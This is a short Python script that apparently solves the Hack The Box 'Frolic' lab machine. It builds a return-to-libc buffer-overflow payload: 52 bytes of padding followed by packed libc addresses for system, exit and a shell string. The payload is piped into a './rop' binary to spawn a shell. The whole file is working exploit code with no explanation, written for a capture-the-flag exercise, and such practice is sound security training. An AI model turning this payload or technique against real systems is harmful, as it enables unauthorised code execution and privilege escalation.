#!/usr/bin/python
'''
' Run ./rop $(python /dev/shm/exploit.py)
' On HTB Frolic Machine
'''

import struct

bfr = 'A'*52
libc = 0xb7e19000
system = struct.pack('<I', libc + 0x0003ada0)
exit = struct.pack('<I', libc + 0x0002e9d0)
shell = struct.pack('<I', libc + 0x0015ba0b)

print(bfr + system + exit + shell)